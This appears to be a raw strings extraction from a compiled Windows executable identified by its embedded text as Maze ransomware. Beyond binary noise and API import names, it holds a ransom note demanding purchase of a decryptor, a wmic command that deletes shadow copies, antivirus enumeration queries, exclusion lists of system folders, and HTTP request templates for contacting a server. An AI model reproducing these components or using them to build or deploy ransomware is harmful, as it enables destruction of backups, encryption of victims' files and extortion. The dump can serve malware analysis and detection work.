!This program cannot be run in DOS mode.
`.rdata
@.data
D$@WVPh
D$ Phu
NGGCCCC
kernel32.dll
DDDDDDDD
EEEEEEEEWU
UVWh6!@
kernel32.dll
4$FFWh
DDDDVh
kernel32.dll
jUhu&@
kernel32.dll
user32.dll
SVh +@
kernel32.dll
^_[]DDDD
WPhv-@
kernel32.dll
kernel32.dll
DDDDVh
1PhB3@
SPUhV4@
user32.dll
FFFFVj
user32.dll
$LILIAAAAj
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
@@@@@UPh^
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
\$(j@h
D$ PSh
user32.dll
DDDDDDDD
t$|hnG@
kernel32.dll
@SVh%K@
4$huK@
kernel32.dll
kernel32.dll
6VhkM@
DDDDWh
DDDDDDDD^_[]
kernel32.dll
4$h:P@
user32.dll
QPh`Q@
DDDD^_[]
D$(SS%
D$$DDRE
D$ IL_A
DDDDDDDD
DDDDDDDD
user32.dll
PUh2T@
kernel32.dll
kernel32.dll
kernel32.dll
$LILIAAAAj
kernel32.dll
kernel32.dll
kernel32.dll
t$$hTY@
QPhC[@
SPhu[@
D$0PVhM
kernel32.dll
DDDDSh
DDDDVh6
kernel32.dll
kernel32.dll
DDDDDDDD
DDDDDDDD
t$hhGa@
CCCCCCCCSh
$UhOb@
DDDDDDDD
t$`UhAd@
user32.dll
KKKKKKKKSh
DDDDDDDDSVUWhSj@
L$ WPQW
G j PV
3<$3l$
+q +Q$f
+q +Q$f
D$4VUP
D$\WVP
t$<VWU
l$(SWU
l$(SWU
t$`)D$
\$,+L$l
T$,)L$
|$X+\$h
DDDD^_[]
#D$<3D$@
3T$H#D$,#T$81
\$ #L$$#\$
#t$(#L$01
\$D#D$
D$H#L$D
D$(#L$
t$$#D$@1
D$8#L$<
D$$#L$H
D$@3T$
#L$,#t$(
L$(#L$8
D$4FFFFFFFF
D$Hy!~
DDDDDDDD
D$pWPh
DDDDDDDD
DDDDj VSh0/A
j WShh/A
|$0WSh
DDDDDDDDWh
D$tPWSh"0A
SPhD0A
DDDDDDDD
kernel32.dll
kernel32.dll
WBBBBBBBB9
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
^_[]DDDD
t$8hLDA
VPh'EA
kernel32.dll
4^DDDD
4^DDDD
kernel32.dll
DDDDf.
kernel32.dll
 ^_[]DDDD
kernel32.dll
user32.dll
L$LjhR
D$LPh`NA
D$xctio
D$tdire
D$pFsRe
D$low64
D$hertW
D$d4Rev
D$`Wow6
L$LPhKPA
UPh|PA
t$Hh/QA
^_[]DDDD
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
DDDD@Ph6`A
kernel32.dll
DDDDDDDDSh
DDDD@Ph&aA
kernel32.dll
7^_[]DDDD
DDDD^DDDD
^_[]DDDD
kernel32.dll
kernel32.dll
kernel32.dll
DDDD^_[DDDD
^_[]DDDD
DDDD@@PhFgA
DDDDDDDD
DDDD^_DDDD
DDDD^_DDDD
FFFFFFF
DDDD@Ph
PUh9iA
DDDDDDDDVh
DDDD@Ph
kernel32.dll
D$@PSj
D$@PVj
kernel32.dll
uYShPlA
^_[]DDDD
kernel32.dll
DDDD@@Ph_oA
DDDDDDDDUh
<$jPhspA
kernel32.dll
kernel32.dll
kernel32.dll
D$@jnhO
\$@jGh
|$ Whz
user32.dll
kernel32.dll
user32.dll
kernel32.dll
DDDDDDDD
kernel32.dll
D<;VPh
DDDDDDDD9
D$8th: 
D$4Leng
D$0ent-
D$,ContS
D$DPh;zA
DDDDDDDD1
kernel32.dll
4$hY{A
4$h|~A
user32.dll
kernel32.dll
DDDDVha
^_[]DDDD
kernel32.dll
DDDDDDDD^_[]DDDD
kernel32.dll
\$DjLh
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
D$h2123
D$d6543
D$`9887
D$\4678
D$X6525
D$T7897
D$P2154
D$L3743
D$D3245
D$@0987
DDDDDDDD
kernel32.dll
kernel32.dll
DDDDDDDD
kernel32.dll
DDDDDDDD
kernel32.dll
^_[]DDDD
^_[]DDDD
 ]DDDD
4]DDDD
kernel32.dll
kernel32.dll
DDDDDDDD]DDDD
 ]DDDD
8^_]DDDD
4]DDDD
@@@@@@@@
4]DDDD
`AAAAAAAA
kernel32.dll
kernel32.dll
kernel32.dll
4^_]DDDD
user32.dll
kernel32.dll
0]DDDD
kernel32.dll
kernel32.dll
T^]DDDD
0]DDDD
kernel32.dll
t$4Why
DDDDDDDD
GGGGWRQh
DDDDDDDD
DDDDDDDD
L$ VQPh
L$ VQPh
)D$ SR
$QPRh0
AAAA;H
AAAAAAAA;H
AAAA;H
AAAAAAAA;H
w{AAAARQPh
$AAAAAAA
DDDD^_[]
AAAAAAA
$AAAAAAA
DDDD^_[]
HHHHHHHH
DDDDDDDD^_[]
$AAAAAAA
AAAAAAA
DDDD^_[]
DDDDDDDD
L$,;L$(
AAAAAAA
DDDDDDDD
HHHHHHHH
$AAAAAAA
$AAAAAAA
$AAAAAAA
$AAAAAAA
AAAAAAA
DDDD^_
DDDD^_
IIIIIIII
AAAAAAA
AAAAAAA
AAAAAAA
IIIIIIII
AAAAAAA
DDDD^_[]
$AAAAAAA
DDDD^_[]
$0< uw
$AAAAAAA
AAAAAAA
DDDD^_[]
$0<0u 
DDDD^_[]
f-]"f!
kernel32.dll
kernel32.dll
user32.dll
^_[DDDD
^_[DDDD
^_[DDDD
^[DDDD
^[DDDD
^[DDDD
uahvoD
T^_DDDD
^_]DDDD
UVh7FB
WVhpFB
DDDDDDDD
DDDDDDDD
4$h$JB
SVh~MB
WUh1NB
^_[]DDDD
@@@@@@
^_[]DDDD
@@@@@@
WPhoRB
@Vh_SB
^_[]DDDD
DDDDWhtVB
DDDDDDDDj
^_DDDD
WVhS`B
^_[]DDDD
j0h7fB
^_DDDD
^_DDDD
DDDD^_[]DDDD
$Uh_sB
^_[]DDDD
DDDDDDDD^_[]DDDD
$^_[]DDDD
$DDDD^DDDD
Wj Pht
^]DDDD
^]DDDD
^]DDDD
^]DDDD
P j@Rh
DDDDSh
^_[]DDDD
P j@Rh
DDDD^_[]DDDD
@@@@@@@@
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
advapi32.dll
advapi32.dll
advapi32.dll
kernel32.dll
kernel32.dll
DDDDDDDD^_[DDDD
advapi32.dll
kernel32.dll
kernel32.dll
user32.dll
advapi32.dll
advapi32.dll
advapi32.dll
kernel32.dll
user32.dll
user32.dll
DDDDDDDD
kernel32.dll
DDDDDDDD
kernel32.dll
DDDDDDDD
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
^_[]DDDD
user32.dll
user32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
PQRVSh'
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
user32.dll
^_DDDD
USWVPhx
advapi32.dll
kernel32.dll
user32.dll
advapi32.dll
advapi32.dll
DDDD^_[]
kernel32.dll
^_DDDD
^_DDDD
A,DDDD
kernel32.dll
uajzh]
kernel32.dll
kernel32.dll
A(DDDD
w(^_DDDD
^_DDDD
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
DDDDSh
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
0^_DDDD
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
^_DDDD
^_[]DDDD
kernel32.dll
^_[]DDDD
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
^_[DDDD
DDDDDDDD
^_[DDDD
kernel32.dll
kernel32.dll
DDDDDDDD
kernel32.dll
kernel32.dll
^_[DDDD
DDDD^DDDD
DDDD^DDDD
kernel32.dll
kernel32.dll
kernel32.dll
H^_DDDD
DDDDDDDD^DDDD
ole32.dll
ole32.dll
ole32.dll
FFFFFFFF
ole32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
^_[]DDDD
USWVPj
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
DDDD^_[]DDDD
WUSVh\@C
DDDDDDDD^_[]
user32.dll
gdi32.dll
gdi32.dll
gdi32.dll
gdi32.dll
kernel32.dll
gdi32.dll
D$ PUh
gdi32.dll
gdi32.dll
gdi32.dll
gdi32.dll
|$4PQUh<
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
user32.dll
kernel32.dll
gdi32.dll
(Pj@h!YC
gdi32.dll
kernel32.dll
kernel32.dll
QPSUht
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
user32.dll
l$ PWh
gdi32.dll
gdi32.dll
4$ho`C
gdi32.dll
^_[]DDDD
PPPh,zD
user32.dll
kernel32.dll
kernel32.dll
^_DDDD
USWVPh
kernel32.dll
t$ PhcgC
aPh_gC
kernel32.dll
D$D394
D$@4628
D$XPhumC
^_DDDD
kernel32.dll
^[DDDD
kernel32.dll
user32.dll
kernel32.dll
^_DDDD
kernel32.dll
83729304958372930dhejskrlt9483s
.action
.phtml
.shtml
register
logout
content
private
messages
account
webauth
webaccess
archive
signin
signout
update
support
ticket
tracker
analytics
checkout
payout
withdrawal
create
transfer
http://%s%s
ntdll.dll
NtQueryEaFile
LILITH
%EMAIL_ADDRESS%
%BASE64_PLACEHOLDER%
NtSetEaFile
D7q/;M
Wow64RevertWow64FsRedirection
Wow64DisableWow64FsRedirection
realloc
msvcrt.dll
malloc
GET /%s HTTP/1.1
User-Agent: %s
Host: %s
Connection: Keep-Alive
POST /%s HTTP/1.1
User-Agent: %s
Host: %s
Content-Type: %s
Content-Length: %d
Connection: Keep-Alive
Content-Length: 
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
application/x-www-form-urlencoded
37432154789765254678988765432123
09873245
expand 32-byte kexpand 16-byte k
AnimateWindow
AdjustWindowRect
DestroyWindow
EnumChildWindows
MessageBoxW
wsprintfW
DeferWindowPos
CloseWindow
GetForegroundWindow
PostQuitMessage
ShutdownBlockReasonCreate
DefWindowProcA
ShutdownBlockReasonDestroy
RegisterClassExW
CreateWindowExW
GetMessageA
TranslateMessage
DispatchMessageA
ReleaseDC
USER32.dll
SetPaletteEntries
SelectPalette
GetDeviceCaps
SetPixel
DeleteObject
GDI32.dll
GetVersionExA
MoveFileExA
GetWindowsDirectoryA
CreateFileA
GetFileSize
LocalAlloc
ReadFile
CloseHandle
WriteFile
DeviceIoControl
OpenMutexW
CreateMutexW
lstrlenA
GetModuleHandleA
LoadLibraryA
lstrcpyA
CreateFileW
HeapAlloc
lstrcatA
GetProcAddress
GetTickCount
lstrcatW
GetLastError
ExitProcess
VirtualAlloc
ExitThread
TlsSetValue
OutputDebugStringW
VirtualFree
WaitForSingleObject
TlsGetValue
CreateToolhelp32Snapshot
Process32FirstW
Process32NextW
GetModuleHandleW
GetSystemDirectoryW
CreateProcessW
GetShortPathNameW
ExpandEnvironmentStringsW
GetCurrentProcessId
VirtualQuery
VirtualProtect
IsBadReadPtr
FreeLibrary
lstrcmpA
UnmapViewOfFile
lstrcmpiW
lstrlenW
lstrcpyW
MoveFileExW
FindFirstFileW
lstrcmpW
FindNextFileW
FindClose
CreateThread
WaitForMultipleObjects
GetDriveTypeW
GetTickCount64
SetThreadExecutionState
GetFileSizeEx
SetFilePointerEx
CreateFileMappingW
MapViewOfFile
GetCurrentProcess
LocalFree
GetUserDefaultUILanguage
InitializeCriticalSection
DeleteCriticalSection
SetLastError
EnterCriticalSection
LeaveCriticalSection
TerminateThread
GlobalAlloc
GlobalFree
KERNEL32.dll
InitializeSecurityDescriptor
LsaFreeMemory
LsaCreateTrustedDomainEx
CryptGenRandom
LsaAddAccountRights
LsaClose
AreAllAccessesGranted
EqualDomainSid
EncryptionDisable
LsaQueryTrustedDomainInfo
LookupAccountSidW
CryptAcquireContextW
CryptGenKey
CryptExportKey
CryptDestroyKey
CryptReleaseContext
GetSidSubAuthorityCount
GetSidSubAuthority
CryptImportKey
CryptEncrypt
CryptDecrypt
ADVAPI32.dll
SHGetFolderPathW
ShellExecuteExW
SHELL32.dll
LsaConnectUntrusted
Secur32.dll
DsRoleGetPrimaryDomainInformation
DsRoleFreeMemory
NETAPI32.dll
StrToIntA
StrStrW
SHLWAPI.dll
WNetOpenEnumW
WNetEnumResourceW
WNetAddConnection2W
WNetCloseEnum
MPR.dll
inet_pton
WS2_32.dll
InternetOpenA
InternetCrackUrlA
InternetConnectA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
InternetCloseHandle
InternetReadFile
WININET.dll
CryptBinaryToStringA
CryptStringToBinaryA
CRYPT32.dll
CoUninitialize
CoInitializeEx
CoCreateInstance
ole32.dll
IsProcessorFeaturePresent
BINRES
msvcp5%d.dll
Uc32nbspacec97c98c99c100c101c102c103c104c105c106c107c108c109c110c111c112c113c114c115c116c117c118c119c120c121c122_0061h_0062h_0063h_0064h_0065h_0066h_0067h_0068h_0069h_006Ah_006Bh_006Ch_006Dh_006Eh_006Fh_0070h_0071h_0072h_0073h_0074h_0075h_0076h_0077h_0078h_0079h_007AhFLW33abcdefghijklmnopqrstuvwzyz. ABCDEFGHIJKLMNOPQRSTUVWXYZ. 1234567890.
rusqsuu=
prkMtx
e?#\Tn
Q4Rn>n
Y.LO3oYz
0x^#.hL
>*6$S<
%/ZU7~
I0'^a,
pf!qE^
d)z$vCq U
6^bE_2Cri<3$
X?Oo#
]5b"hs
lQN[,fzPm
q5roEra
;bh6b_
e?#\Tn
TW8Y~e?
r>0d1J
DfIB'h6B
@,tLW1
>isT2"
)?tG_`tz ,
nF=~Z:
0-L*V~T
6}mz>z_
lrU*Ce
V%9t{7}
`%-}vY
hh)o%(Q`
iYe#XMNhC
*iY}iX
XWK{a<
QD|=EU
#@uI3~E
Y^9p.:
"_8^uaW
C&C>@t.X
+=]MmXvp
,oN=N@4
~[Djw3
ww;_a
nF=~Z:
aZ4Oz%
GHw,!S
ppO+#L
S+aJ}m>
_2Oj]A
?l1t=;*S
>.bgJmE
+c.xcXK@D
-I=wZXz
KYCU;V
Fz&&wd
%GD@GD
oc1BLhX
2aWYDs7
o~E<\
oNK_HT
(OnT)il
([8EB&
,hSy3I
C:v@d=B
'TGt(v
Rm>;b<
2zYYl$
AA]Yc@DI%
y=:"i,O
hpZpS/
3DhEF)
`U!s'x
m><CZr
"i)R~I$
k&{Rt@R.
gq'~Io
SAD.`}
@$9>uu
%\>qwS
^Y!A{Q2
qX+<13OgK
qj2tnG
G$1Y_p!e
DSZGhq
/pOZog2
`]Vh4}f
q<uj;z
jD:*!u
cA7AO9]B'4
pxVDAc
UEhQt:_
J0fV23 0
{*.k-|
jGl@ur
4zHDbj:
)i_%S)
Ed{o*i
JzBdSx
=yxK{8
)&3'N@y
U=M7?LsZ
x=;P+{
/v:_xR
dIIJ<bK
%e%%e^
iVbV^Pp
fm=P6Ds
#HHx
j`@99bIQ
FKEapO
ej]WUg
lF2"Or
azyBRo
a:Z2-T
&6D+hux
O~OyJ5
hCAC@o
N@C~\F
9ziwK;L
]RX]Kmk
D^pTa+
5EvSZwe
j3i1e)}V
$^6&6M[
rm@Wcn
Hbhfps
A(A![C@:
z~1\.uC
:#JMo+B
6`S?(]j5
!2NrmAl
-)tNJb
jjjjjj
jjjjjj
jjjjjjj
@\foo.db
eMicrosoft Enhanced Cryptographic Provider v1.0
nkernel32
\wbem\wmic.exe
"%s" shadowcopy delete
A%windir%\system32\wbem\wmic
process call create "cmd /c start %s"
:\Windows
\Program Files
\Games\
\Tor Browser\
\ProgramData\
\cache2\entries\
\Low\Content.IE5\
\User Data\Default\Cache\
\All Users
qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890
B1234567890qwertyuiopasdfghjklzxcvbnm
Global\%s
DECRYPT-FILES.html
autorun.inf
boot.ini
desktop.ini
ntuser.dat
iconcache.db
bootsect.bak
ntuser.dat.log
thumbs.db
Bootfont.bin
overflow|
Broot\SecurityCenter2
Select * From AntiVirusProduct
displayName
|overflow|
%c_%c_%d/%d|
1234567890
Bqwertyuiopasdfghjklzxcvbnm1234567890                        
CMaze Ransomware
Dear %s, your files have been encrypted by RSA-2048 and ChaCha algorithms
The only way to restore them is to buy decryptor
These algorithms are one of the strongest
You can read about them at wikipedia
If you understand importance of situation you can restore all files by following instructions in DECRYPT-FILES.html file
You can decrypt 1 file for free as a proof of work
We know that this computer is a 
standalone server
server in corporate network
workstation in corporate network
home computer
primary domain controller
backup server
very valuable for you
So we will give you appropriate price for recovering
\123456789.bmp
You need to buy decryptor in order to restore the files.
%s! Alert! %s! Alert! Dear %s Your files have been encrypted by %s! Attention! %s
